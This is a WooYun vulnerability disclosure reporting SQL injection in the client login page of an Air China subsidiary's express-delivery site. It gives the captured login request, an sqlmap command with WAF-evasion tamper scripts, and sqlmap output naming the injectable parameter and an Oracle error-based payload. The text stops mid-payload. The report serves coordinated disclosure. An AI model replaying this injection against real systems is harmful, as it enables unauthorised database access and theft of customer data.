当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0100604

漏洞标题:中国国际航空股份有限公司旗下某站存在SQL注入(数百万信息数据)

相关厂商:中国国际航空股份有限公司

漏洞作者: Ch4r0n

提交时间:2015-03-11 10:08

修复时间:2015-04-25 10:10

公开时间:2015-04-25 10:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-11: 细节已通知厂商并且等待厂商处理中
2015-03-13: 厂商已经确认,细节仅向厂商公开
2015-03-23: 细节向核心白帽子及相关领域专家公开
2015-04-02: 细节向普通白帽子公开
2015-04-12: 细节向实习白帽子公开
2015-04-25: 细节向公众公开

简要描述:

PS:这个是不是大厂商,应该走大厂商流程吧?

详细说明:

民航快递有限责任公司
http://www.cae.com.cn/Default.aspx
大客户登录处存在SQL注入,Oracle数据库,就单单看了CAE一个数据库就可以获取数百万数据信息,同时也可以获取客户信息,公司信息,管理员信息等。
存在SQL注入的地址

http://www.cae.com.cn/webfunction/customerinquiries/CusLogin.aspx?


测试.jpg


随便输入,然后登录抓包
========================================================

POST http://www.cae.com.cn/webfunction/customerinquiries/CusLogin.aspx HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; QQBrowser/8.0.3345.400)
Referer: http://www.cae.com.cn/webfunction/customerinquiries/CusLogin.aspx?
Accept-Language: zh-CN
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.cae.com.cn
Content-Length: 9081
Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=ymj0s43y1agbpb45zt3y2g45
__VIEWSTATE=
%2FwEPDwUKMjEwMDk5MTMwMg9kFgJmD2QWAgIDD2QWBAIBDw8WAh4EVGV4dAX7CDx0YWJsZSBjZWxscGFkZGluZz0iMCIg
Y2VsbHNwYWNpbmc9IjAiIGNsYXNzPSJNZW51VGFibGUiPjx0cj48dGQgYWxpZ249bGVmdCB3aWR0aD0iMTFweCI
%2BPGltZyBzcmM9Ii9pbWFnZXMvbWVudV9sZWZ0LmdpZiIgLz48L3RkPiA8dGQgaWQ9Im1lbnV0ZDAiIGNsYXNzPSJNZW51VGRfb
W92ZSIgb25tb3VzZW1vdmU9Im5UYWJzKHRoaXMsMCkiIHN0eWxlPSJjdXJzb3I6cG9pbnRlciIgb25jbGljaz0iSmF2YXNjcmlwdDpsb2N
hdGlvbi5ocmVmPScvRGVmYXVsdC5hc3B4JyI%2B6aaWIOmhtTwvdGQ%2BPHRkICB3aWR0aD0iMTFweCI
%2BPGltZyBzcmM9Ii9pbWFnZXMvbWVudV9iay5naWYiIC8%2BPC90ZD48dGQgaWQ9Im1lbnV0ZDEiIGNsYXNzPSJNZW51VGQiIG9
ubW91c2Vtb3ZlPSJuVGFicyh0aGlzLDEpIiBzdHlsZT0iY3Vyc29yOnBvaW50ZXIiID7lnKjnur%2FmlK
%2FmjIE8L3RkPjx0ZCAgd2lkdGg9IjExcHgiPjxpbWcgc3JjPSIvaW1hZ2VzL21lbnVfYmsuZ2lmIiAvPjwvdGQ
%2BPHRkIGlkPSJtZW51dGQyIiBjbGFzcz0iTWVudVRkIiBvbm1vdXNlbW92ZT0iblRhYnModGhpcywyKSIgc3R5bGU9ImN1cnNvcjpwb2
ludGVyIiA
%2B5Lqn5ZOB5LiO5pyN5YqhPC90ZD48dGQgIHdpZHRoPSIxMXB4Ij48aW1nIHNyYz0iL2ltYWdlcy9tZW51X2JrLmdpZiIgLz48L3RkPjx
0ZCBpZD0ibWVudXRkMyIgY2xhc3M9Ik1lbnVUZCIgb25tb3VzZW1vdmU9Im5UYWJzKHRoaXMsMykiIHN0eWxlPSJjdXJzb3I6cG9pb
nRlciIgPuaWsOmXu%2BWKqOaAgTwvdGQ%2BPHRkICB3aWR0aD0iMTFweCI
%2BPGltZyBzcmM9Ii9pbWFnZXMvbWVudV9iay5naWYiIC8%2BPC90ZD48dGQgaWQ9Im1lbnV0ZDQiIGNsYXNzPSJNZW51VGQiIG
9ubW91c2Vtb3ZlPSJuVGFicyh0aGlzLDQpIiBzdHlsZT0iY3Vyc29yOnBvaW50ZXIiID7kurrmiY3mi5vogZg8L3RkPjx0ZCAgd2lkdGg9IjExc
HgiPjxpbWcgc3JjPSIvaW1hZ2VzL21lbnVfYmsuZ2lmIiAvPjwvdGQ
%2BPHRkIGlkPSJtZW51dGQ1IiBjbGFzcz0iTWVudVRkIiBvbm1vdXNlbW92ZT0iblRhYnModGhpcyw1KSIgc3R5bGU9ImN1cnNvcjpwb
2ludGVyIiA%2B6LWw6L
%2BbQ0FFPC90ZD48dGQgYWxpZ249cmlnaHQgd2lkdGg9IjExcHgiPjxpbWcgc3JjPSIvaW1hZ2VzL21lbnVfcmlnaHQuZ2lmIj48L3RkPj
wvdHI
%2BPC90YWJsZT5kZAIDDw8WAh8ABdcoPHRhYmxlIGNlbGxwYWRkaW5nPTAgY2VsbHNwYWNpbmc9MCB3aWR0aD0iOTglIiAga
WQ9Im15VGFiMF9Db250ZW50MCIgY2xhc3M9IlRhYkNvbnRlbnREaXZTaG93Ij48dHI%2BPHRkIHdpZHRoPTMzcHg
%2BJm5ic3A7PC90ZD4gPHRkPiA8dGFibGUgY2VsbHBhZGRpbmc9MCBjZWxsc3BhY2luZz0wPjx0cj48dGQ%2BPHVsPjwvdWw
%2BPC90ZD48L3RyPjwvdGFibGU%2BPC90ZD48L3RyPjwvdGFibGU
%2BPHRhYmxlIGNlbGxwYWRkaW5nPTAgY2VsbHNwYWNpbmc9MCB3aWR0aD0iOTglIiAgaWQ9Im15VGFiMF9Db250ZW50MSIgY
2xhc3M9IlRhYkNvbnRlbnREaXYiPjx0cj48dGQgd2lkdGg9MTU1cHg
%2BJm5ic3A7PC90ZD4gPHRkPiA8dGFibGUgY2VsbHBhZGRpbmc9MCBjZWxsc3BhY2luZz0wPjx0cj48dGQ
%2BPHVsPjxsaT48YSBocmVmPSIvd2ViRnVuY3Rpb24vRGVsaXZlcnlSYW5nZS9EZWZhdWx0LmFzcHgiPuWPlumAgeiMg
%2BWbtDwvYT48L2xpPjxsaT4mbmJzcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT48bGk
%2BPGEgaHJlZj0iL3dlYkZ1bmN0aW9uL0V4cHJlc3NRdWVyeS9EZWZhdWx0LmFzcHgiPuW%2Fq
%2BS7tuafpeivojwvYT48L2xpPjxsaT4mbmJzcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT48bGk
%2BPGEgaHJlZj0iL3dlYkZ1bmN0aW9uL0N1c3RvbWVySW5xdWlyaWVzL0RlZmF1bHQuYXNweCI%2B5aSn5a6i5oi35p%2Bl6K
%2BiPC9hPjwvbGk
%2BPGxpPiZuYnNwOyZuYnNwOyZuYnNwO3wmbmJzcDsmbmJzcDsmbmJzcDs8L2xpPjxsaT48YSBocmVmPSIvd2ViRnVuY3Rpb24v
V2ViQ29tcGxhaW50L0RlZmF1bHQuYXNweCI%2B5oqV6K%2BJ5LiO5bu66K6uPC9hPjwvbGk
%2BPGxpPiZuYnNwOyZuYnNwOyZuYnNwO3wmbmJzcDsmbmJzcDsmbmJzcDs8L2xpPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24v
UXNjV2ViL2RlZmF1bHQuYXNweCI%2B5Y2P5L2c5bmz5Y%2BwPC9hPjwvbGk%2BPC91bD48L3RkPjwvdHI
%2BPC90YWJsZT48L3RkPjwvdHI
%2BPC90YWJsZT48dGFibGUgY2VsbHBhZGRpbmc9MCBjZWxsc3BhY2luZz0wIHdpZHRoPSI5OCUiICBpZD0ibXlUYWIwX0NvbnRlbn
QyIiBjbGFzcz0iVGFiQ29udGVudERpdiI
%2BPHRyPjx0ZD4mbmJzcDs8L3RkPiA8dGQgcm93bmFwIGFsaWduPWNlbnRlcj4gPHRhYmxlIGNlbGxwYWRkaW5nPTAgY2VsbHNw
YWNpbmc9MD48dHI%2BPHRkPjx1bD48bGk%2BPGEgaHJlZj0iamF2YXNjcmlwdDp2b2lkKDApIj7moIflh4bkuqflk4E8L2E
%2BPHVsPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B4P25pZD1mOTNmY2ZiNzllM2Q0YzM3YTY5NTk4ZDAxOT
dhNzkzMCI
%2B6ZmQ5pe25pyN5YqhPC9hPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B4P25pZD0zYjZlOTQ1NDBiZDE0NTRk
YjAyNjk5Zjk0ZTFmNGUwNiI
%2B5YiG5pe26YCS6YCBPC9hPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B4P25pZD1iYjc4NTAyMWJlYzE0NzIxOT
cyODI5ZDY0ZDYxNjAwYSI%2B5pmu6LSn6L%2BQ6L6TPC9hPjwvdWw
%2BPC9saT48L2xpPjxsaT4mbmJzcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT48bGk
%2BPGEgaHJlZj0iamF2YXNjcmlwdDp2b2lkKDApIj7lop7lgLzmnI3liqE8L2E
%2BPHVsPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B4P25pZD1lNTI2OWM2YTU2NTk0MGRjYmI1YmE4NmYyNj
I4Mjk5NCI
%2B5byA566x6aqM6LSnPC9hPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B4P25pZD0wY2RiNTU5ZTJjODc0MDVl
OTU1NTQxZTJiZWIzODY1ZCI%2B562%2B5Y2V6L
%2BU5ZuePC9hPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B4P25pZD1mMGExNWE0ZTZlMTA0ZGYzYTRmOGY1
NDI5NTUwZWIxOCI
%2B5Lul5pen5o2i5pawPC9hPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B4P25pZD00ZGRhMTAzM2ZmOWM0YT
E3OGYyMGRlMTQ3MjFiNDNmMiI%2B5L%2Bd5Lu35pyN5YqhPC9hPjwvdWw
%2BPC9saT48L2xpPjxsaT4mbmJzcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT48bGk
%2BPGEgaHJlZj0iamF2YXNjcmlwdDp2b2lkKDApIj7kuKrmgKfmlrnmoYg8L2E
%2BPHVsPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B4P25pZD1iMTJlNDY3ZmRjOTQ0OWZlODIwNTcyZmI4OTV
hOTRlMiI
%2B5aSH5Lu254mp5rWB6Kej5Yaz5pa55qGIPC9hPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B4P25pZD02ZDYwZ
jJiNzgyZTA0NDc2ODcwNWMyNjk2OWRlNmQxNyI%2B57u85ZCI54mp5rWB6Kej5Yaz5pa55qGIPC9hPjwvdWw
%2BPC9saT48L2xpPjxsaT4mbmJzcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT48bGk
%2BPGEgaHJlZj0iL3dlYmZ1bmN0aW9uL3dlYnBhZ2UuYXNweD9uaWQ9MDllNmVjZTFmODY4NDU2YWJjNTdhOTNkMDRkZWI0YT
AiPuWbvemZheS4muWKoTwvYT48L2xpPjxsaT4mbmJzcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT48bGk
%2BPGEgaHJlZj0iamF2YXNjcmlwdDp2b2lkKDApIj7lrqLmiLfpobvnn6U8L2E
%2BPHVsPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B4P25pZD01MjEyNjUwMzM3ZjY0ZmM0YTE1OGUwNDU5
MWJmZThmZSI%2B5b
%2Br6YCS5Y2V5aGr5YaZ5oyH5byVPC9hPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B4P25pZD1jNzcwZjE3ZDM2
ZTU0NDFmYmU5ZGYzOWM3YzIzZjJhYSI%2B56aB6L%2BQ44CB6ZmQ6L
%2BQ54mp5ZOBPC9hPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B4P25pZD1jZDZlZDEwMDk4Y2Y0NmQwOTU3
NDU5MmM1MWNmOGE3OSI
%2B5pyN5Yqh5rWB56iLPC9hPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B4P25pZD0yYjVkOThjYzcwY2Y0ZDRkO
WQ4OTk4ZjE5MjM2NTZiNiI%2B6LWU5YG
%2F5pa55rOVPC9hPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B4P25pZD00ODI4ZTYyZjgzODI0OTI5ODFhYTFh
MWIyYzJjNWFlMCI%2B6LSn54mp5L%2Bd5Lu3PC9hPjwvdWw
%2BPC9saT48L2xpPjxsaT4mbmJzcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT48bGk
%2BPGEgaHJlZj0iL3dlYmZ1bmN0aW9uL3dlYnBhZ2UuYXNweD9uaWQ9MzljOTUzY2NhOTcxNDFlMDgzMjlkZTMyYjE5MDM3MzEi
PuS%2Fg%2BmUgOa0u%2BWKqDwvYT48L2xpPjwvdWw%2BPC90ZD48L3RyPjwvdGFibGU%2BPC90ZD48L3RyPjwvdGFibGU
%2BPHRhYmxlIGNlbGxwYWRkaW5nPTAgY2VsbHNwYWNpbmc9MCB3aWR0aD0iOTglIiAgaWQ9Im15VGFiMF9Db250ZW50MyIgY
2xhc3M9IlRhYkNvbnRlbnREaXYiPjx0cj48dGQgd2lkdGg9MjU1cHg
%2BJm5ic3A7PC90ZD4gPHRkIGFsaWduPWNlbnRlcj4gPHRhYmxlIGNlbGxwYWRkaW5nPTAgY2VsbHNwYWNpbmc9MD48dHI
%2BPHRkPjx1bD48bGk
%2BPGEgaHJlZj0iL3dlYkZ1bmN0aW9uL3dlYnBhZ2VuZXdzbGlzdC5hc3B4P25yaWQ9NjQ2ZmUwODcwZDRkNGFiYjgxNzM4NWQw
YmYwNjEyZWYiPkNBReaWsOmXuzwvYT48L2xpPjxsaT4mbmJzcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT48bGk
%2BPGEgaHJlZj0iL3dlYkZ1bmN0aW9uL3dlYnBhZ2VuZXdzbGlzdC5hc3B4P25yaWQ9YzUzMDAwNDZjNTA3NDkzNWI4MTg2Mzc3Z
mNmNzJhMTIiPuWbvei1hOWnlOimgemXuzwvYT48L2xpPjxsaT4mbmJzcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9s
aT48bGk
%2BPGEgaHJlZj0iL3dlYkZ1bmN0aW9uL3dlYnBhZ2VuZXdzbGlzdC5hc3B4P25yaWQ9YTg5NWNkZmMxZDg2NGVlNTkxNWJmZjFiO
WUxOGEzMGYiPuacgOaWsOWFrOWRijwvYT48L2xpPjwvdWw%2BPC90ZD48L3RyPjwvdGFibGU%2BPC90ZD48L3RyPjwvdGFibGU
%2BPHRhYmxlIGNlbGxwYWRkaW5nPTAgY2VsbHNwYWNpbmc9MCB3aWR0aD0iOTglIiAgaWQ9Im15VGFiMF9Db250ZW50NCIgY
2xhc3M9IlRhYkNvbnRlbnREaXYiPjx0cj48dGQ
%2BJm5ic3A7PC90ZD4gPHRkICBhbGlnbj1yaWdodD4gPHRhYmxlIGNlbGxwYWRkaW5nPTAgY2VsbHNwYWNpbmc9MD48dHI
%2BPHRkPjx1bD48bGk
%2BPGEgaHJlZj0iL3dlYmZ1bmN0aW9uL3dlYnBhZ2UuYXNweD9uaWQ9OTliMGNlNTA2ODkzNDM1OWJhMWJlMmNhMTZjYTk5Z
mMiPuagoeWbreaLm%2BiBmDwvYT48L2xpPjxsaT4mbmJzcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT48bGk
%2BPGEgaHJlZj0iL3dlYmZ1bmN0aW9uL3dlYnBhZ2UuYXNweD9uaWQ9M2UxZTgxOGJmNDg4NDg3YzkzNTYyZTNhZGJkMGM2Zj
kiPuekvuS8muaLm%2BiBmDwvYT48L2xpPjxsaT4mbmJzcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT48bGk
%2BPGEgaHJlZj0iL3dlYmZ1bmN0aW9uL3dlYnBhZ2UuYXNweD9uaWQ9OTU5MjBjNTE5M2NkNDY1OThhZDYxMDM1ZWZiMjBkYzI
iPue7hOe7h%2BacuuaehDwvYT48L2xpPjwvdWw%2BPC90ZD48L3RyPjwvdGFibGU%2BPC90ZD48L3RyPjwvdGFibGU
%2BPHRhYmxlIGNlbGxwYWRkaW5nPTAgY2VsbHNwYWNpbmc9MCB3aWR0aD0iOTglIiAgaWQ9Im15VGFiMF9Db250ZW50NSIgY2
xhc3M9IlRhYkNvbnRlbnREaXYiPjx0cj48dGQ
%2BJm5ic3A7PC90ZD4gPHRkICBhbGlnbj1yaWdodD4gPHRhYmxlIGNlbGxwYWRkaW5nPTAgY2VsbHNwYWNpbmc9MD48dHI
%2BPHRkPjx1bD48bGk
%2BPGEgaHJlZj0iL3dlYmZ1bmN0aW9uL3dlYnBhZ2UuYXNweD9uaWQ9MThlMmI1NGRlOGRkNDQ0Nzg3Yzk3NjZjNDc4YTUzYWEi
PuWFrOWPuOeugOS7izwvYT48L2xpPjxsaT4mbmJzcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT48bGk
%2BPGEgaHJlZj0iL3dlYmZ1bmN0aW9uL3dlYnBhZ2UuYXNweD9uaWQ9OGE0OGRkMzRmYjZlNDY1ZGEzNGY2NDBjMDY1NWM5
MjUiPuiNo%2BiqieWllumhuTwvYT48L2xpPjxsaT4mbmJzcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT48bGk
%2BPGEgaHJlZj0iL3dlYmZ1bmN0aW9uL3dlYnBhZ2UuYXNweD9uaWQ9NDM3MTdhMzhkZTJlNGFmNGFkZjRiYzBjMjRmNGM1M2
EiPuekvuS8mui0o%2BS7uzwvYT48L2xpPjxsaT4mbmJzcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT48bGk
%2BPGEgaHJlZj0iL3dlYmZ1bmN0aW9uL3RwYyI%2B6IGM5bel5pGE5b2xPC9hPjwvbGk%2BPC91bD48L3RkPjwvdHI
%2BPC90YWJsZT48L3RkPjwvdHI%2BPC90YWJsZT5kZGT0mAfcvqhDKQI2kzBu9UyObtsaDA%3D
%3D&__VIEWSTATEGENERATOR=AE5782F1&__EVENTVALIDATION=%2FwEWBAK
%2Bi5q8CQKzw6qfBwKitfm4CgKugbOqA1lvp1DFBSSWXxhoONbn0wk7MTt3&ctl00%24Content_Body
%24Cp_User=admin&ctl00%24Content_Body%24Cp_Pass=123456&ctl00%24Content_Body%24Button1=%E7%99%BB+%E5%BD
%95


===================================================
ctl00%24Content_Body%24Cp_User(也就是sqlmap处显示的ctl00$Content_Body$Cp_User)参数存在注入
直接看神器sqlmap的测试过程吧,使用--tamper "between.py,space2comment.py,randomcase.py" --level 3
============================================

POST parameter 'ctl00$Content_Body$Cp_User' is vulnerable. Do you want to keep t
esting the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 3140 HTTP(s) re
quests:
---
Place: POST
Parameter: ctl00$Content_Body$Cp_User
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: __VIEWSTATE=/wEPDwUKMjEwMDk5MTMwMg9kFgJmD2QWAgIDD2QWBAIBDw8WAh4EVGV
4dAX7CDx0YWJsZSBjZWxscGFkZGluZz0iMCIgY2VsbHNwYWNpbmc9IjAiIGNsYXNzPSJNZW51VGFibGU
iPjx0cj48dGQgYWxpZ249bGVmdCB3aWR0aD0iMTFweCI PGltZyBzcmM9Ii9pbWFnZXMvbWVudV9sZWZ
0LmdpZiIgLz48L3RkPiA8dGQgaWQ9Im1lbnV0ZDAiIGNsYXNzPSJNZW51VGRfbW92ZSIgb25tb3VzZW1
vdmU9Im5UYWJzKHRoaXMsMCkiIHN0eWxlPSJjdXJzb3I6cG9pbnRlciIgb25jbGljaz0iSmF2YXNjcml
wdDpsb2NhdGlvbi5ocmVmPScvRGVmYXVsdC5hc3B4JyI 6aaWIOmhtTwvdGQ PHRkICB3aWR0aD0iMTF
weCI PGltZyBzcmM9Ii9pbWFnZXMvbWVudV9iay5naWYiIC8 PC90ZD48dGQgaWQ9Im1lbnV0ZDEiIGN
sYXNzPSJNZW51VGQiIG9ubW91c2Vtb3ZlPSJuVGFicyh0aGlzLDEpIiBzdHlsZT0iY3Vyc29yOnBvaW5
0ZXIiID7lnKjnur/mlK/mjIE8L3RkPjx0ZCAgd2lkdGg9IjExcHgiPjxpbWcgc3JjPSIvaW1hZ2VzL21
lbnVfYmsuZ2lmIiAvPjwvdGQ PHRkIGlkPSJtZW51dGQyIiBjbGFzcz0iTWVudVRkIiBvbm1vdXNlbW9
2ZT0iblRhYnModGhpcywyKSIgc3R5bGU9ImN1cnNvcjpwb2ludGVyIiA 5Lqn5ZOB5LiO5pyN5YqhPC9
0ZD48dGQgIHdpZHRoPSIxMXB4Ij48aW1nIHNyYz0iL2ltYWdlcy9tZW51X2JrLmdpZiIgLz48L3RkPjx
0ZCBpZD0ibWVudXRkMyIgY2xhc3M9Ik1lbnVUZCIgb25tb3VzZW1vdmU9Im5UYWJzKHRoaXMsMykiIHN
0eWxlPSJjdXJzb3I6cG9pbnRlciIgPuaWsOmXu WKqOaAgTwvdGQ PHRkICB3aWR0aD0iMTFweCI PGl
tZyBzcmM9Ii9pbWFnZXMvbWVudV9iay5naWYiIC8 PC90ZD48dGQgaWQ9Im1lbnV0ZDQiIGNsYXNzPSJ
NZW51VGQiIG9ubW91c2Vtb3ZlPSJuVGFicyh0aGlzLDQpIiBzdHlsZT0iY3Vyc29yOnBvaW50ZXIiID7
kurrmiY3mi5vogZg8L3RkPjx0ZCAgd2lkdGg9IjExcHgiPjxpbWcgc3JjPSIvaW1hZ2VzL21lbnVfYms
uZ2lmIiAvPjwvdGQ PHRkIGlkPSJtZW51dGQ1IiBjbGFzcz0iTWVudVRkIiBvbm1vdXNlbW92ZT0iblR
hYnModGhpcyw1KSIgc3R5bGU9ImN1cnNvcjpwb2ludGVyIiA 6LWw6L bQ0FFPC90ZD48dGQgYWxpZ24
9cmlnaHQgd2lkdGg9IjExcHgiPjxpbWcgc3JjPSIvaW1hZ2VzL21lbnVfcmlnaHQuZ2lmIj48L3RkPjw
vdHI PC90YWJsZT5kZAIDDw8WAh8ABdcoPHRhYmxlIGNlbGxwYWRkaW5nPTAgY2VsbHNwYWNpbmc9MCB
3aWR0aD0iOTglIiAgaWQ9Im15VGFiMF9Db250ZW50MCIgY2xhc3M9IlRhYkNvbnRlbnREaXZTaG93Ij4
8dHI PHRkIHdpZHRoPTMzcHg Jm5ic3A7PC90ZD4gPHRkPiA8dGFibGUgY2VsbHBhZGRpbmc9MCBjZWx
sc3BhY2luZz0wPjx0cj48dGQ PHVsPjwvdWw PC90ZD48L3RyPjwvdGFibGU PC90ZD48L3RyPjwvdGF
ibGU PHRhYmxlIGNlbGxwYWRkaW5nPTAgY2VsbHNwYWNpbmc9MCB3aWR0aD0iOTglIiAgaWQ9Im15VGF
iMF9Db250ZW50MSIgY2xhc3M9IlRhYkNvbnRlbnREaXYiPjx0cj48dGQgd2lkdGg9MTU1cHg Jm5ic3A
7PC90ZD4gPHRkPiA8dGFibGUgY2VsbHBhZGRpbmc9MCBjZWxsc3BhY2luZz0wPjx0cj48dGQ PHVsPjx
saT48YSBocmVmPSIvd2ViRnVuY3Rpb24vRGVsaXZlcnlSYW5nZS9EZWZhdWx0LmFzcHgiPuWPlumAgei
Mg WbtDwvYT48L2xpPjxsaT4mbmJzcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT4
8bGk PGEgaHJlZj0iL3dlYkZ1bmN0aW9uL0V4cHJlc3NRdWVyeS9EZWZhdWx0LmFzcHgiPuW/q S7tua
fpeivojwvYT48L2xpPjxsaT4mbmJzcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT4
8bGk PGEgaHJlZj0iL3dlYkZ1bmN0aW9uL0N1c3RvbWVySW5xdWlyaWVzL0RlZmF1bHQuYXNweCI 5aS
n5a6i5oi35p l6K iPC9hPjwvbGk PGxpPiZuYnNwOyZuYnNwOyZuYnNwO3wmbmJzcDsmbmJzcDsmbmJ
zcDs8L2xpPjxsaT48YSBocmVmPSIvd2ViRnVuY3Rpb24vV2ViQ29tcGxhaW50L0RlZmF1bHQuYXNweCI
 5oqV6K J5LiO5bu66K6uPC9hPjwvbGk PGxpPiZuYnNwOyZuYnNwOyZuYnNwO3wmbmJzcDsmbmJzcDs
mbmJzcDs8L2xpPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vUXNjV2ViL2RlZmF1bHQuYXNweCI 5Y2
P5L2c5bmz5Y wPC9hPjwvbGk PC91bD48L3RkPjwvdHI PC90YWJsZT48L3RkPjwvdHI PC90YWJsZT4
8dGFibGUgY2VsbHBhZGRpbmc9MCBjZWxsc3BhY2luZz0wIHdpZHRoPSI5OCUiICBpZD0ibXlUYWIwX0N
vbnRlbnQyIiBjbGFzcz0iVGFiQ29udGVudERpdiI PHRyPjx0ZD4mbmJzcDs8L3RkPiA8dGQgcm93bmF
wIGFsaWduPWNlbnRlcj4gPHRhYmxlIGNlbGxwYWRkaW5nPTAgY2VsbHNwYWNpbmc9MD48dHI PHRkPjx
1bD48bGk PGEgaHJlZj0iamF2YXNjcmlwdDp2b2lkKDApIj7moIflh4bkuqflk4E8L2E PHVsPjxsaT4
8YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B4P25pZD1mOTNmY2ZiNzllM2Q0YzM3YTY5NTk
4ZDAxOTdhNzkzMCI 6ZmQ5pe25pyN5YqhPC9hPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGF
nZS5hc3B4P25pZD0zYjZlOTQ1NDBiZDE0NTRkYjAyNjk5Zjk0ZTFmNGUwNiI 5YiG5pe26YCS6YCBPC9
hPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B4P25pZD1iYjc4NTAyMWJlYzE0NzI
xOTcyODI5ZDY0ZDYxNjAwYSI 5pmu6LSn6L Q6L6TPC9hPjwvdWw PC9saT48L2xpPjxsaT4mbmJzcDs
mbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT48bGk PGEgaHJlZj0iamF2YXNjcmlwdDp
2b2lkKDApIj7lop7lgLzmnI3liqE8L2E PHVsPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGF
nZS5hc3B4P25pZD1lNTI2OWM2YTU2NTk0MGRjYmI1YmE4NmYyNjI4Mjk5NCI 5byA566x6aqM6LSnPC9
hPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B4P25pZD0wY2RiNTU5ZTJjODc0MDV
lOTU1NTQxZTJiZWIzODY1ZCI 562 5Y2V6L U5ZuePC9hPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24
vd2VicGFnZS5hc3B4P25pZD1mMGExNWE0ZTZlMTA0ZGYzYTRmOGY1NDI5NTUwZWIxOCI 5Lul5pen5o2
i5pawPC9hPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B4P25pZD00ZGRhMTAzM2Z
mOWM0YTE3OGYyMGRlMTQ3MjFiNDNmMiI 5L d5Lu35pyN5YqhPC9hPjwvdWw PC9saT48L2xpPjxsaT4
mbmJzcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT48bGk PGEgaHJlZj0iamF2YXN
jcmlwdDp2b2lkKDApIj7kuKrmgKfmlrnmoYg8L2E PHVsPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24
vd2VicGFnZS5hc3B4P25pZD1iMTJlNDY3ZmRjOTQ0OWZlODIwNTcyZmI4OTVhOTRlMiI 5aSH5Lu254m
p5rWB6Kej5Yaz5pa55qGIPC9hPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B4P25
pZD02ZDYwZjJiNzgyZTA0NDc2ODcwNWMyNjk2OWRlNmQxNyI 57u85ZCI54mp5rWB6Kej5Yaz5pa55qG
IPC9hPjwvdWw PC9saT48L2xpPjxsaT4mbmJzcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A
7PC9saT48bGk PGEgaHJlZj0iL3dlYmZ1bmN0aW9uL3dlYnBhZ2UuYXNweD9uaWQ9MDllNmVjZTFmODY
